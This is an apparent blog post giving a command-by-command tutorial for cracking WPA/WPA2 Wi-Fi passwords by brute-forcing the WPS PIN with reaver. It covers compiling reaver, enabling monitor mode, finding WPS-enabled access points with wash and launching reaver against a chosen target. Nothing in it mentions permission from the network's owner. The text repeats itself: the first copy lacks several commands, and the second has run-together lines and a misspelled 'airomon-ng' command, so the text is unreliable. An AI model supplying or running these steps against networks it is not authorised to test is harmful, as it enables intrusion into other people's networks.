WPA or even WPA2 can be easily cracked under 10 hours provided that WPS is enabled on the router. The software we'll use is reaver.
The hardware I'm using is Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04 and driver is iwl3945.
First install the necessary libraries to compile the software. Run the following command in terminal to do so.
Download reaver from
reaver-1.0.tar.gz 708 KB
reaver-1.1.tar.gz 705 KB
reaver-1.2.tar.gz 712 KB
reaver-1.3.tar.gz 730 KB
reaver-1.4.tar.gz 748 KB
by running the command wget -c http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Now extract it by running tar xf reaver-1.4.tar.gz
Now run the following commands to compile the software.
Now let's install aircrack-ng(Optional). We'll not be using aircrack directly but use its tool to assist our cracking. You can install it by running:
First of all we have to enable monitor mode on our wireless interface. To do so run
This will create a new interface mon0 (ath0 in other drivers) with monitor mode enabled.
You can also use ifconfig command to bring the interface in monitor mode. Aircrack-ng will not be required in this way.
Now let's check if the AP has WPS support. Run the command
sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If its listed then the AP supports WPS and can be cracked. Just note the channel and BSSID of the AP you want.
Now lets run reaver command.
sudo reaver -i mon0 -b bssid-you-noted-above -vv -c channel-you-noted-above --no-nacks
Now the software will start brute forcing the PIN and will generate the WPA/WPA2 PSK in less than 10 hours.
The hardware I'm using is Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04 and driver is iwl3945.
First install the necessary libraries to compile the software. Run the following command in terminal to do so.
sudo apt-get install libsqlite3-dev
libpcap0.8-dev build-essentialNow open terminal and go inside /tmp folder.
Download reaver from
reaver-1.0.tar.gz 708 KB
reaver-1.1.tar.gz 705 KB
reaver-1.2.tar.gz 712 KB
reaver-1.3.tar.gz 730 KB
reaver-1.4.tar.gz 748 KBby running the command wget -c http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=
Now extract it by running tar xf reaver-1.4.tar.gz
Now run the following commands to compile the software.
./configureAfter this reaver will be installed on your system.
make
sudo make install
Now let's install aircrack-ng(Optional). We'll not be using aircrack directly but use its tool to assist our cracking. You can install it by running:
sudo apt-get install aircrack-ng
Now comes the attacking part.
First of all we have to enable monitor mode on our wireless interface. To do so run
sudo airomon-ng start wlan0 .
This will create a new interface mon0 (ath0 in other drivers) with monitor mode enabled.
You can also use ifconfig command to bring the interface in monitor mode. Aircrack-ng will not be required in this way.
Now let's check if the AP has WPS support. Run the command
sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If its listed then the AP supports WPS and can be cracked. Just note the channel and BSSID of the AP you want.
Now lets run reaver command.
sudo reaver -i mon0 -b bssid-you-noted-above -vv -c channel-you-noted-above --no-nacks
Now the software will start brute forcing the PIN and will generate the WPA/WPA2 PSK in less than 10 hours.
0 comments:
Post a Comment